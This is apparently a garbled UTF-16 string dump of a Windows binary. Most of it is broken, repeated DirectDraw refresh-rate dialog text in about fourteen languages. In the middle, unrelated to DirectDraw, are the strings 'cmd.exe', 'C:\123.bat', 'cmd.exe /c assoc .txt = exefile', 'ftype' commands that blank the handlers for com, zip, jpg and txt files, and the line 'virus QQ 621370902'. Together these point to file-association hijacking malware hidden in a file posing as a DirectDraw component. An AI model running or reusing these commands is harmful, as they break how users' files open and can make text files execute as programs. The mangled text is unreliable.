D�i�r�e�c�t�D�r�a�w�
D�i�r�e�c�t�D�r�a�w�-�v�e�r�n�i�e�u�w�i�n�g�s�g�e�d�r�a�g� �w�i�j�z�i�g�e�n�
M�S� �S�h�e�l�l� �D�l�g�
A�n�n�u�l�e�r�e�n�
V�e�r�n�i�e�u�w�i�n�g�s�f�r�e�q�u�e�n�t�i�e�
&�S�t�a�n�d�a�a�r�d�
A�n�d�e�r�e� �&�w�a�a�r�d�e�:�
W�a�a�r�s�c�h�u�w�i�n�g�:� �d�e�z�e� �i�n�s�t�e�l�l�i�n�g�e�n� �d�i�e�n�e�n� �a�l�l�e�e�n� �d�o�o�r� �e�r�v�a�r�e�n� �g�e�b�r�u�i�k�e�r�s� �t�e� �w�o�r�d�e�n� �g�e�w�i�j�z�i�g�d�.�
K�i�e�s� �S�t�a�n�d�a�a�r�d� �a�l�s� �u� �v�o�o�r� �h�e�t� �s�t�a�n�d�a�a�r�d�g�e�d�r�a�g� �v�a�n� �D�i�r�e�c�t�D�r�a�w� �k�i�e�s�t�.� �K�i�e�s� �a�n�d�e�r�s� �A�n�d�e�r�e� �w�a�a�r�d�e� �e�n� �g�e�e�f� �d�e� �v�e�r�n�i�e�u�w�i�n�g�s�f�r�e�q�u�e�n�t�i�e� �d�i�e� �u� �w�i�l�t� �g�e�b�r�u�i�k�e�n� �i�n� �h�e�t� �i�n�v�o�e�r�v�a�k� �o�p�.�
O�v�e�r�s�t�y�r� �D�i�r�e�c�t�D�r�a�w�-�o�p�p�d�a�t�e�r�i�n�g�s�o�p�p�f�
M�S� �S�h�e�l�l� �D�l�g�
A�v�b�r�y�t�
O�p�p�d�a�t�e�r�i�n�g�s�f�r�e�k�v�e�n�s�
&�S�t�a�n�d�a�r�d�
&�O�v�e�r�s�t�y�r�i�n�g�s�v�e�r�d�i�:�
A�d�v�a�r�s�e�l�!� � �B�a�r�e� �a�v�a�n�s�e�r�t�e� �b�r�u�k�e�r�e� �b�
r� �e�n�d�r�e� �d�i�s�s�e� �i�n�n�s�t�i�l�l�i�n�g�e�n�e�.�
K�l�i�k�k� �S�t�a�n�d�a�r�d� �f�o�r� �
�b�r�u�k�e� �s�t�a�n�d�a�r�d�o�p�p�f�
r�s�e�l�e�n� �i� �D�i�r�e�c�t�D�r�a�w�,� �e�l�l�e�r� �K�l�i�k�k� �O�v�e�r�s�t�y�r�i�n�g�s�v�e�r�d�i� �o�g� �a�n�g�i� �o�p�p�d�a�t�e�r�i�n�g�s�f�r�e�k�v�e�n�s�e�n� �d�u� �v�i�l� �t�v�i�n�g�e� �i� �r�e�d�i�g�e�r�i�n�g�s�b�o�k�s�e�n�.�
Z�m�i�e�n�i�a�n�i�e� �z�a�c�h�o�w�a�n�i�a� �f�u�n�k�c�j�i� �o�d�
a�n�i�a� �D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
A�n�u�l�u�j�
s�t�o�t�l�i�w�o�
&�W�a�r�t�o�
O�s�t�r�z�e�
e�n�i�e�:� �t�e� �u�s�t�a�w�i�e�n�i�a� �p�o�w�i�n�n�i� �z�m�i�e�n�i�a�
�t�y�l�k�o� �z�a�a�w�a�n�s�o�w�a�n�i� �u�
y�t�k�o�w�n�i�c�y�.�
K�l�i�k�n�i�j� �o�p�c�j�
,� �a�b�y� �u�
l�n�e�g�o� �z�a�c�h�o�w�a�n�i�a� �p�r�o�g�r�a�m�u� �D�i�r�e�c�t�D�r�a�w�,� �l�u�b� �k�l�i�k�n�i�j� �o�p�c�j�
�i� �w�p�i�s�z� �
s�t�o�t�l�i�w�o�
a�n�i�a� �w� �p�o�l�u� �e�d�y�c�y�j�n�y�m�.�
S�u�b�s�t�i�t�u�i�r� �c�o�m�p�o�r�t�a�m�e�n�t�o� �d�e� �a�t�u�a�l�i�z�a�
o� �d�o� �D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
C�a�n�c�e�l�a�r�
T�a�x�a� �d�e� �a�t�u�a�l�i�z�a�
&�S�u�b�s�t�i�t�u�i�r� �v�a�l�o�r�:�
A�v�i�s�o�:� �s�o�m�e�n�t�e� �u�s�u�
r�i�o�s� �a�v�a�n�
a�d�o�s� �d�e�v�e�m� �a�l�t�e�r�a�r� �e�s�t�a�s� �c�o�n�f�i�g�u�r�a�
C�l�i�q�u�e� �e�m� �'�P�a�d�r�
o�'� �p�a�r�a� �u�s�a�r� �o� �c�o�m�p�o�r�t�a�m�e�n�t�o� �p�a�d�r�
o� �d�o� �D�i�r�e�c�t�D�r�a�w� �o�u� �c�l�i�q�u�e� �e�m� �'�S�u�b�s�t�i�t�u�i�r� �v�a�l�o�r�'� �e� �d�i�g�i�t�e� �a� �t�a�x�a� �d�e� �a�t�u�a�l�i�z�a�
o� �q�u�e� �v�o�c�
�d�e�s�e�j�a� �f�o�r�
a�r� �n�a� �c�a�i�x�a� �d�e� �e�d�i�
�D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
�D�i�r�e�c�t�D�r�a�w� �
t�t� �u�p�p�d�a�t�e�r�i�n�g�s�f�
r�f�a�r�a�n�d�e� �f�
r� �D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
A�v�b�r�y�t�
U�p�p�d�a�t�e�r�i�n�g�s�i�n�t�e�r�v�a�l�l�
&�S�t�a�n�d�a�r�d�
&�E�g�e�t� �v�
V�a�r�n�i�n�g�!� �E�n�d�a�s�t� �a�v�a�n�c�e�r�a�d�e� �a�n�v�
n�d�a�r�e� �b�
n�d�r�a� �d�e�s�s�a� �i�n�s�t�
l�l�n�i�n�g�a�r�.�
K�l�i�c�k�a� �p�
�S�t�a�n�d�a�r�d� �o�m� �d�u� �v�i�l�l� �a�n�v�
n�d�a� �s�t�a�n�d�a�r�d�v�
r�d�e�n� �f�
r� �D�i�r�e�c�t�D�r�a�w�.� �K�l�i�c�k�a� �p�
�E�g�e�t� �v�
r�d�e� �o�c�h� �a�n�g�e� �u�p�p�d�a�t�e�r�i�n�g�s�i�n�t�e�r�v�a�l�l� �o�m� �d�u� �i�n�t�e� �v�i�l�l� �a�n�v�
n�d�a� �s�t�a�n�d�a�r�d�v�
D�i�r�e�c�t�D�r�a�w� �Y�e�n�i�l�e�m�e� �D�a�v�r�a�n�
e�r�s�i�z� �K�
M�S� �S�h�e�l�l� �D�l�g�
Y�e�n�i�l�e�m�e� �H�
&�V�a�r�s�a�y�
e�r�s�i�z� �K�
l�m�a� �D�e�
:� �B�u� �a�y�a�r�l�a�r�
z�c�a� �i�l�e�r�i� �d�
z�e�y� �k�u�l�l�a�n�
l�a�r� �d�e�
t�i�r�m�e�l�i�.�
D�i�r�e�c�t�D�r�a�w�'�u�n� �v�a�r�s�a�y�
l�a�n� �d�a�v�r�a�n�
�k�u�l�l�a�n�m�a�k� �i�
i�n� �"�V�a�r�s�a�y�
n� �y�a� �d�a� �"�G�e�
e�r�s�i�z� �K�
c�m�d�.�e�x�e�
M�d�5�_�S�t�r�i�n�g�_�C�a�l�c�
C�:�\�1�2�3�.�b�a�t�
c�m�d�.�e�x�e� �/�c� �a�s�s�o�c� �.�t�x�t� �=� �e�x�e�f�i�l�e�
c�m�d�.�e�x�e� �/�c� �f�t�y�p�e� �c�o�m�f�i�l�e�=�
c�m�d�.�e�x�e� �/�c� �f�t�y�p�e� �z�i�p�f�i�l�e�=�
c�m�d�.�e�x�e� �/�c� �f�t�y�p�e� �j�p�g�f�i�l�e�=�
c�m�d�.�e�x�e� �/�c� �f�t�y�p�e� �t�x�t�f�i�l�e�=�
�z�n�k�z�z�
v�i�r�u�s� �Q�Q� �6�2�1�3�7�0�9�0�2�
V�S�_�V�E�R�S�I�O�N�_�I�N�F�O�
S�t�r�i�n�g�F�i�l�e�I�n�f�o�
0�8�0�4�0�4�B�0�
C�o�m�p�a�n�y�N�a�m�e�
F�i�l�e�D�e�s�c�r�i�p�t�i�o�n�
L�e�g�a�l�C�o�p�y�r�i�g�h�t�
L�e�g�a�l�T�r�a�d�e�m�a�r�k�s�
P�r�o�d�u�c�t�N�a�m�e�
F�i�l�e�V�e�r�s�i�o�n�
P�r�o�d�u�c�t�V�e�r�s�i�o�n�
I�n�t�e�r�n�a�l�N�a�m�e�
O�r�i�g�i�n�a�l�F�i�l�e�n�a�m�e�
V�a�r�F�i�l�e�I�n�f�o�
T�r�a�n�s�l�a�t�i�o�n�
(�&�4�-�2�7�;�
(�&�4�-�2�7�;�
(�&�4�-�2�7�;�
`�\�k�h�c�q�
`�\�k�h�c�q�
`�\�k�h�c�q�
�D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
�D�i�r�e�c�t�D�r�a�w� �
�D�i�r�e�c�t�D�r�a�w� �
�D�i�r�e�c�t�D�r�a�w� �
e�p�s�a�t� �n�a�s�t�a�v�e�n�
�o�b�n�o�v�o�v�a�c�
�f�r�e�k�v�e�n�c�e�
M�S� �S�h�e�l�l� �D�l�g�
S�t�o�r�n�o�
O�b�n�o�v�o�v�a�c�
�f�r�e�k�v�e�n�c�e�
�h�o�d�n�o�t�a�:�
U�p�o�z�o�r�n�
:� �T�a�t�o� �n�a�s�t�a�v�e�n�
n�i�t� �p�o�u�z�e� �z�k�u�
i�v�a�t�e�l�
C�h�c�e�t�e�-�l�i� �p�o�u�
�n�a�s�t�a�v�e�n�
�o�b�n�o�v�o�v�a�c�
�f�r�e�k�v�e�n�c�e� �r�o�z�h�r�a�n�
�D�i�r�e�c�t�D�r�a�w�,� �k�l�e�p�n�
t�e� �n�a� �p�
.� �J�i�n�a�k� �k�l�e�p�n�
t�e� �n�a� �p�
�h�o�d�n�o�t�a� �a� �z�a�d�e�j�t�e� �p�o�
a�d�o�v�a�n�o�u� �o�b�n�o�v�o�v�a�c�
�f�r�e�k�v�e�n�c�i�.�
S�k�i�f�t� �a�f� �o�p�d�a�t�e�r�i�n�g�s�f�u�n�k�t�i�o�n� �t�i�l� �D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
A�n�n�u�l�l�e�r�
O�p�d�a�t�e�r�i�n�g�s�h�a�s�t�i�g�h�e�d�
&�S�t�a�n�d�a�r�d�
N�y� �&�o�p�d�a�t�e�r�i�n�g�s�v�
A�d�v�a�r�s�e�l�!� �K�u�n� �e�r�f�a�r�n�e� �b�r�u�g�e�r�e� �b�
n�d�r�e� �d�i�s�s�e� �i�n�d�s�t�i�l�l�i�n�g�e�r�.�
K�l�i�k� �p�
�"�S�t�a�n�d�a�r�d�"� �f�o�r� �a�t� �b�r�u�g�e� �D�i�r�e�c�t�D�r�a�w�s� �s�t�a�n�d�a�r�d�o�p�d�a�t�e�r�i�n�g�,� �e�l�l�e�r� �k�l�i�k� �p�
�"�N�y� �o�p�d�a�t�e�r�i�n�g�s�v�
r�d�i�"� �o�g� �s�k�r�i�v� �d�e�n� �o�p�d�a�t�e�r�i�n�g�s�h�a�s�t�i�g�h�e�d�,� �s�o�m� �d�u� �v�i�l� �b�r�u�g�e�.�
D�i�r�e�c�t�D�r�a�w�-�A�k�t�u�a�l�i�s�i�e�r�u�n�g�s�v�e�r�h�a�l�t�e�n�
M�S� �S�h�e�l�l� �D�l�g�
A�b�b�r�e�c�h�e�n�
A�k�t�u�a�l�i�s�i�e�r�u�n�g�s�r�a�t�e�
&�S�t�a�n�d�a�r�d�
&�W�e�r�t� �f�
r� �d�i�e� �A�u�
e�r�k�r�a�f�t�s�e�t�z�u�n�g�:�
W�a�r�n�u�n�g�:� �D�i�e�s�e� �E�i�n�s�t�e�l�l�u�n�g�e�n� �s�o�l�l�t�e�n� �n�u�r� �v�o�n� �f�o�r�t�g�e�s�c�h�r�i�t�t�e�n�e�n� �B�e�n�u�t�z�e�r�n� �g�e�
n�d�e�r�t� �w�e�r�d�e�n�.�
K�l�i�c�k�e�n� �S�i�e� �a�u�f� �"�S�t�a�n�d�a�r�d�"�,� �u�m� �d�a�s� �S�t�a�n�d�a�r�d�v�e�r�h�a�l�t�e�n� �v�o�n� �D�i�r�e�c�t�D�r�a�w� �z�u� �v�e�r�w�e�n�d�e�n�,� �o�d�e�r� �k�l�i�c�k�e�n� �S�i�e� �a�u�f� �"�W�e�r�t� �f�
r� �d�i�e� �A�u�
e�r�k�r�a�f�t�s�e�t�z�u�n�g�"�,� �u�n�d� �g�e�b�e�n� �S�i�e� �d�i�e� �g�e�w�
n�s�c�h�t�e� �A�k�t�u�a�l�i�s�i�e�r�u�n�g�s�r�a�t�e� �e�i�n�.�
�D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
�D�i�r�e�c�t�D�r�a�w� �
O�v�e�r�r�i�d�e� �D�i�r�e�c�t�D�r�a�w� �R�e�f�r�e�s�h� �B�e�h�a�v�i�o�r�
M�S� �S�h�e�l�l� �D�l�g�
C�a�n�c�e�l�
R�e�f�r�e�s�h� �R�a�t�e�
&�D�e�f�a�u�l�t�
&�O�v�e�r�r�i�d�e� �V�a�l�u�e�:�
W�a�r�n�i�n�g�:� �O�n�l�y� �a�d�v�a�n�c�e�d� �u�s�e�r�s� �s�h�o�u�l�d� �c�h�a�n�g�e� �t�h�e�s�e� �s�e�t�t�i�n�g�s�.�
C�l�i�c�k� �"�D�e�f�a�u�l�t�"� �t�o� �u�s�e� �D�i�r�e�c�t�D�r�a�w�'�s� �d�e�f�a�u�l�t� �b�e�h�a�v�i�o�r�,� �o�r� �c�l�i�c�k� �"�O�v�e�r�r�i�d�e� �V�a�l�u�e�"� �a�n�d� �t�y�p�e� �t�h�e� �r�e�f�r�e�s�h� �r�a�t�e� �t�h�a�t� �y�o�u� �w�a�n�t� �t�o� �f�o�r�c�e� �i�n�t�o� �t�h�e� �e�d�i�t� �b�o�x�.�
K�o�r�v�a�a� �D�i�r�e�c�t�D�r�a�w�'�n� �v�i�r�k�i�s�t�y�s�t�a�a�j�u�u�s�
M�S� �S�h�e�l�l� �D�l�g�
P�e�r�u�u�t�a�
V�i�r�k�i�s�t�y�s�t�a�a�j�u�u�s�
&�O�l�e�t�u�s�
&�K�o�r�v�a�u�s�a�r�v�o�:�
V�a�r�o�i�t�u�s�:� �V�a�i�n� �k�o�k�e�n�e�i�d�e�n� �k�
j�i�e�n� �t�u�l�i�s�i� �m�u�u�t�t�a�a� �n�
�a�s�e�t�u�k�s�i�a�.�
�D�i�r�e�c�t�D�r�a�w�'�n� �o�l�e�t�u�s�a�r�v�o�a� �v�a�l�i�t�s�e�m�a�l�l�a� �O�l�e�t�u�s� �t�a�i� �k�i�r�j�o�i�t�a� �h�a�l�u�a�m�a�s�i� �v�i�r�k�i�s�t�y�s�t�a�a�j�u�u�s� �K�o�r�v�a�u�s�a�r�v�o�-�r�u�u�t�u�u�n�.�
q�u�e�n�c�e� �d�e� �r�a�f�r�a�
c�h�i�s�s�e�m�e�n�t� �D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
A�n�n�u�l�e�r�
q�u�e�n�c�e� �d�e� �r�a�f�r�a�
c�h�i�s�s�e�m�e�n�t�
&�P�a�r� �d�
&�R�e�m�p�l�a�c�e�r� �p�a�r� �l�a� �v�a�l�e�u�r�
A�t�t�e�n�t�i�o�n�
:� �n�e� �m�o�d�i�f�i�e�z� �c�e�s� �p�a�r�a�m�
t�r�e�s� �q�u�e� �s�i� �v�o�u�s� �
t�e�s� �u�n� �u�t�i�l�i�s�a�t�e�u�r� �e�x�p�
r�i�m�e�n�t�
C�l�i�q�u�e�z� �s�u�r� �"�P�a�r� �d�
f�a�u�t�"� �p�o�u�r� �u�t�i�l�i�s�e�r� �l�a� �f�r�
q�u�e�n�c�e� �p�a�r� �d�
f�a�u�t� �d�e� �D�i�r�e�c�t�D�r�a�w�,� �o�u� �c�l�i�q�u�e�z� �s�u�r� �"�R�e�m�p�l�a�c�e�r� �p�a�r� �l�a� �v�a�l�e�u�r�"� �e�t� �e�n�t�r�e�z� �u�n�e� �f�r�
q�u�e�n�c�e� �d�e� �r�a�f�r�a�
c�h�i�s�s�e�m�e�n�t� �d�a�n�s� �l�a� �z�o�n�e� �d�e� �t�e�x�t�e�.�
�D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
�D�i�r�e�c�t�D�r�a�w�,� �
A� �D�i�r�e�c�t�D�r�a�w� �f�r�i�s�s�
s�i� �v�i�s�e�l�k�e�d�
n�e�k� �f�e�l�
M�S� �S�h�e�l�l� �D�l�g�
A�z� �&�a�l�a�p�
r�t�e�l�m�e�z�e�t�t� �
k� �h�a�s�z�n�
k� �&�f�e�l�
F�i�g�y�e�l�m�e�z�t�e�t�
s�:� �E�z�e�k�e�t� �a� �b�e�
s�o�k�a�t� �c�s�a�k� �g�y�a�k�o�r�l�o�t�t� �f�e�l�h�a�s�z�n�
A� �D�i�r�e�c�t�D�r�a�w� �a�l�a�p�
r�t�e�l�m�e�z�e�t�t� �v�i�s�e�l�k�e�d�
n�e�k� �h�a�s�z�n�
h�o�z� �j�e�l�
l�j�e� �b�e� �a�z� �"�A�z� �a�l�a�p�
r�t�e�l�m�e�z�e�t�t� �
k� �h�a�s�z�n�
l�a�t�a�"� �l�e�h�e�t�
g�e�t�,� �v�a�g�y� �"�A�z� �
s�a�"� �b�e�j�e�l�
n� �m�e�g�a�d�h�a�t�j�a�,� �h�o�g�y� �m�i�l�y�e�n� �f�r�i�s�s�
k�e�t� �s�z�e�r�e�t�n�e� �h�a�s�z�n�
S�o�s�t�i�t�u�z�i�o�n�e� �f�r�e�q�u�e�n�z�a� �a�g�g�i�o�r�n�a�m�e�n�t�o� �D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
A�n�n�u�l�l�a�
F�r�e�q�u�e�n�z�a� �d�i� �a�g�g�i�o�r�n�a�m�e�n�t�o�
I�m�p�o�s�t�a�z�i�o�n�i� �&�p�r�e�d�e�f�i�n�i�t�e�
&�S�o�s�t�i�t�u�i�s�c�i� �c�o�n�:�
A�v�v�i�s�o�:� �q�u�e�s�t�e� �i�m�p�o�s�t�a�z�i�o�n�i� �d�o�v�r�e�b�b�e�r�o� �e�s�s�e�r�e� �m�o�d�i�f�i�c�a�t�e� �s�o�l�o� �d�a� �u�t�e�n�t�i� �e�s�p�e�r�t�i�.�
S�c�e�g�l�i�e�r�e� �"�I�m�p�o�s�t�a�z�i�o�n�i� �p�r�e�d�e�f�i�n�i�t�e�"� �p�e�r� �u�t�i�l�i�z�z�a�r�e� �l�e� �i�m�p�o�s�t�a�z�i�o�n�i� �p�r�e�d�e�f�i�n�i�t�e� �d�i� �D�i�r�e�c�t�D�r�a�w� �o�p�p�u�r�e� �s�c�e�g�l�i�e�r�e� �"�S�o�s�t�i�t�u�i�s�c�i� �c�o�n�"� �e� �i�m�m�e�t�t�e�r�e� �n�e�l�l�a� �c�a�s�e�l�l�a� �d�i� �m�o�d�i�f�i�c�a� �l�a� �n�u�o�v�a� �f�r�e�q�u�e�n�z�a� �d�i� �a�g�g�i�o�r�n�a�m�e�n�t�o� �d�a� �i�m�p�o�s�t�a�r�e�.�
D�i�r�e�c�t�D�r�a�w� �
M�S� �U�I� �G�o�t�h�i�c�
D�i�r�e�c�t�D�r�a�w� �
D�i�r�e�c�t�D�r�a�w� �
D�i�r�e�c�t�D�r�a�w�
D�i�r�e�c�t�D�r�a�w�-�v�e�r�n�i�e�u�w�i�n�g�s�g�e�d�r�a�g� �w�i�j�z�i�g�e�n�
M�S� �S�h�e�l�l� �D�l�g�
A�n�n�u�l�e�r�e�n�
V�e�r�n�i�e�u�w�i�n�g�s�f�r�e�q�u�e�n�t�i�e�
&�S�t�a�n�d�a�a�r�d�
A�n�d�e�r�e� �&�w�a�a�r�d�e�:�
W�a�a�r�s�c�h�u�w�i�n�g�:� �d�e�z�e� �i�n�s�t�e�l�l�i�n�g�e�n� �d�i�e�n�e�n� �a�l�l�e�e�n� �d�o�o�r� �e�r�v�a�r�e�n� �g�e�b�r�u�i�k�e�r�s� �t�e� �w�o�r�d�e�n� �g�e�w�i�j�z�i�g�d�.�
K�i�e�s� �S�t�a�n�d�a�a�r�d� �a�l�s� �u� �v�o�o�r� �h�e�t� �s�t�a�n�d�a�a�r�d�g�e�d�r�a�g� �v�a�n� �D�i�r�e�c�t�D�r�a�w� �k�i�e�s�t�.� �K�i�e�s� �a�n�d�e�r�s� �A�n�d�e�r�e� �w�a�a�r�d�e� �e�n� �g�e�e�f� �d�e� �v�e�r�n�i�e�u�w�i�n�g�s�f�r�e�q�u�e�n�t�i�e� �d�i�e� �u� �w�i�l�t� �g�e�b�r�u�i�k�e�n� �i�n� �h�e�t� �i�n�v�o�e�r�v�a�k� �o�p�.�
O�v�e�r�s�t�y�r� �D�i�r�e�c�t�D�r�a�w�-�o�p�p�d�a�t�e�r�i�n�g�s�o�p�p�f�
M�S� �S�h�e�l�l� �D�l�g�
A�v�b�r�y�t�
O�p�p�d�a�t�e�r�i�n�g�s�f�r�e�k�v�e�n�s�
&�S�t�a�n�d�a�r�d�
&�O�v�e�r�s�t�y�r�i�n�g�s�v�e�r�d�i�:�
A�d�v�a�r�s�e�l�!� � �B�a�r�e� �a�v�a�n�s�e�r�t�e� �b�r�u�k�e�r�e� �b�
r� �e�n�d�r�e� �d�i�s�s�e� �i�n�n�s�t�i�l�l�i�n�g�e�n�e�.�
K�l�i�k�k� �S�t�a�n�d�a�r�d� �f�o�r� �
�b�r�u�k�e� �s�t�a�n�d�a�r�d�o�p�p�f�
r�s�e�l�e�n� �i� �D�i�r�e�c�t�D�r�a�w�,� �e�l�l�e�r� �K�l�i�k�k� �O�v�e�r�s�t�y�r�i�n�g�s�v�e�r�d�i� �o�g� �a�n�g�i� �o�p�p�d�a�t�e�r�i�n�g�s�f�r�e�k�v�e�n�s�e�n� �d�u� �v�i�l� �t�v�i�n�g�e� �i� �r�e�d�i�g�e�r�i�n�g�s�b�o�k�s�e�n�.�
Z�m�i�e�n�i�a�n�i�e� �z�a�c�h�o�w�a�n�i�a� �f�u�n�k�c�j�i� �o�d�
a�n�i�a� �D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
A�n�u�l�u�j�
s�t�o�t�l�i�w�o�
&�W�a�r�t�o�
O�s�t�r�z�e�
e�n�i�e�:� �t�e� �u�s�t�a�w�i�e�n�i�a� �p�o�w�i�n�n�i� �z�m�i�e�n�i�a�
�t�y�l�k�o� �z�a�a�w�a�n�s�o�w�a�n�i� �u�
y�t�k�o�w�n�i�c�y�.�
K�l�i�k�n�i�j� �o�p�c�j�
,� �a�b�y� �u�
l�n�e�g�o� �z�a�c�h�o�w�a�n�i�a� �p�r�o�g�r�a�m�u� �D�i�r�e�c�t�D�r�a�w�,� �l�u�b� �k�l�i�k�n�i�j� �o�p�c�j�
�i� �w�p�i�s�z� �
s�t�o�t�l�i�w�o�
a�n�i�a� �w� �p�o�l�u� �e�d�y�c�y�j�n�y�m�.�
S�u�b�s�t�i�t�u�i�r� �c�o�m�p�o�r�t�a�m�e�n�t�o� �d�e� �a�t�u�a�l�i�z�a�
o� �d�o� �D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
C�a�n�c�e�l�a�r�
T�a�x�a� �d�e� �a�t�u�a�l�i�z�a�
&�S�u�b�s�t�i�t�u�i�r� �v�a�l�o�r�:�
A�v�i�s�o�:� �s�o�m�e�n�t�e� �u�s�u�
r�i�o�s� �a�v�a�n�
a�d�o�s� �d�e�v�e�m� �a�l�t�e�r�a�r� �e�s�t�a�s� �c�o�n�f�i�g�u�r�a�
C�l�i�q�u�e� �e�m� �'�P�a�d�r�
o�'� �p�a�r�a� �u�s�a�r� �o� �c�o�m�p�o�r�t�a�m�e�n�t�o� �p�a�d�r�
o� �d�o� �D�i�r�e�c�t�D�r�a�w� �o�u� �c�l�i�q�u�e� �e�m� �'�S�u�b�s�t�i�t�u�i�r� �v�a�l�o�r�'� �e� �d�i�g�i�t�e� �a� �t�a�x�a� �d�e� �a�t�u�a�l�i�z�a�
o� �q�u�e� �v�o�c�
�d�e�s�e�j�a� �f�o�r�
a�r� �n�a� �c�a�i�x�a� �d�e� �e�d�i�
�D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
�D�i�r�e�c�t�D�r�a�w� �
t�t� �u�p�p�d�a�t�e�r�i�n�g�s�f�
r�f�a�r�a�n�d�e� �f�
r� �D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
A�v�b�r�y�t�
U�p�p�d�a�t�e�r�i�n�g�s�i�n�t�e�r�v�a�l�l�
&�S�t�a�n�d�a�r�d�
&�E�g�e�t� �v�
V�a�r�n�i�n�g�!� �E�n�d�a�s�t� �a�v�a�n�c�e�r�a�d�e� �a�n�v�
n�d�a�r�e� �b�
n�d�r�a� �d�e�s�s�a� �i�n�s�t�
l�l�n�i�n�g�a�r�.�
K�l�i�c�k�a� �p�
�S�t�a�n�d�a�r�d� �o�m� �d�u� �v�i�l�l� �a�n�v�
n�d�a� �s�t�a�n�d�a�r�d�v�
r�d�e�n� �f�
r� �D�i�r�e�c�t�D�r�a�w�.� �K�l�i�c�k�a� �p�
�E�g�e�t� �v�
r�d�e� �o�c�h� �a�n�g�e� �u�p�p�d�a�t�e�r�i�n�g�s�i�n�t�e�r�v�a�l�l� �o�m� �d�u� �i�n�t�e� �v�i�l�l� �a�n�v�
n�d�a� �s�t�a�n�d�a�r�d�v�
D�i�r�e�c�t�D�r�a�w� �Y�e�n�i�l�e�m�e� �D�a�v�r�a�n�
e�r�s�i�z� �K�
M�S� �S�h�e�l�l� �D�l�g�
Y�e�n�i�l�e�m�e� �H�
&�V�a�r�s�a�y�
e�r�s�i�z� �K�
l�m�a� �D�e�
:� �B�u� �a�y�a�r�l�a�r�
z�c�a� �i�l�e�r�i� �d�
z�e�y� �k�u�l�l�a�n�
l�a�r� �d�e�
t�i�r�m�e�l�i�.�
D�i�r�e�c�t�D�r�a�w�'�u�n� �v�a�r�s�a�y�
l�a�n� �d�a�v�r�a�n�
�k�u�l�l�a�n�m�a�k� �i�
i�n� �"�V�a�r�s�a�y�
n� �y�a� �d�a� �"�G�e�
e�r�s�i�z� �K�
c�m�d�.�e�x�e�
M�d�5�_�S�t�r�i�n�g�_�C�a�l�c�
C�:�\�1�2�3�.�b�a�t�
c�m�d�.�e�x�e� �/�c� �a�s�s�o�c� �.�t�x�t� �=� �e�x�e�f�i�l�e�
c�m�d�.�e�x�e� �/�c� �f�t�y�p�e� �c�o�m�f�i�l�e�=�
c�m�d�.�e�x�e� �/�c� �f�t�y�p�e� �z�i�p�f�i�l�e�=�
c�m�d�.�e�x�e� �/�c� �f�t�y�p�e� �j�p�g�f�i�l�e�=�
c�m�d�.�e�x�e� �/�c� �f�t�y�p�e� �t�x�t�f�i�l�e�=�
�z�n�k�z�z�
v�i�r�u�s� �Q�Q� �6�2�1�3�7�0�9�0�2�
V�S�_�V�E�R�S�I�O�N�_�I�N�F�O�
S�t�r�i�n�g�F�i�l�e�I�n�f�o�
0�8�0�4�0�4�B�0�
C�o�m�p�a�n�y�N�a�m�e�
F�i�l�e�D�e�s�c�r�i�p�t�i�o�n�
L�e�g�a�l�C�o�p�y�r�i�g�h�t�
L�e�g�a�l�T�r�a�d�e�m�a�r�k�s�
P�r�o�d�u�c�t�N�a�m�e�
F�i�l�e�V�e�r�s�i�o�n�
P�r�o�d�u�c�t�V�e�r�s�i�o�n�
I�n�t�e�r�n�a�l�N�a�m�e�
O�r�i�g�i�n�a�l�F�i�l�e�n�a�m�e�
V�a�r�F�i�l�e�I�n�f�o�
T�r�a�n�s�l�a�t�i�o�n�
(�&�4�-�2�7�;�
(�&�4�-�2�7�;�
(�&�4�-�2�7�;�
`�\�k�h�c�q�
`�\�k�h�c�q�
`�\�k�h�c�q�
�D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
�D�i�r�e�c�t�D�r�a�w� �
�D�i�r�e�c�t�D�r�a�w� �
�D�i�r�e�c�t�D�r�a�w� �
e�p�s�a�t� �n�a�s�t�a�v�e�n�
�o�b�n�o�v�o�v�a�c�
�f�r�e�k�v�e�n�c�e�
M�S� �S�h�e�l�l� �D�l�g�
S�t�o�r�n�o�
O�b�n�o�v�o�v�a�c�
�f�r�e�k�v�e�n�c�e�
�h�o�d�n�o�t�a�:�
U�p�o�z�o�r�n�
:� �T�a�t�o� �n�a�s�t�a�v�e�n�
n�i�t� �p�o�u�z�e� �z�k�u�
i�v�a�t�e�l�
C�h�c�e�t�e�-�l�i� �p�o�u�
�n�a�s�t�a�v�e�n�
�o�b�n�o�v�o�v�a�c�
�f�r�e�k�v�e�n�c�e� �r�o�z�h�r�a�n�
�D�i�r�e�c�t�D�r�a�w�,� �k�l�e�p�n�
t�e� �n�a� �p�
.� �J�i�n�a�k� �k�l�e�p�n�
t�e� �n�a� �p�
�h�o�d�n�o�t�a� �a� �z�a�d�e�j�t�e� �p�o�
a�d�o�v�a�n�o�u� �o�b�n�o�v�o�v�a�c�
�f�r�e�k�v�e�n�c�i�.�
S�k�i�f�t� �a�f� �o�p�d�a�t�e�r�i�n�g�s�f�u�n�k�t�i�o�n� �t�i�l� �D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
A�n�n�u�l�l�e�r�
O�p�d�a�t�e�r�i�n�g�s�h�a�s�t�i�g�h�e�d�
&�S�t�a�n�d�a�r�d�
N�y� �&�o�p�d�a�t�e�r�i�n�g�s�v�
A�d�v�a�r�s�e�l�!� �K�u�n� �e�r�f�a�r�n�e� �b�r�u�g�e�r�e� �b�
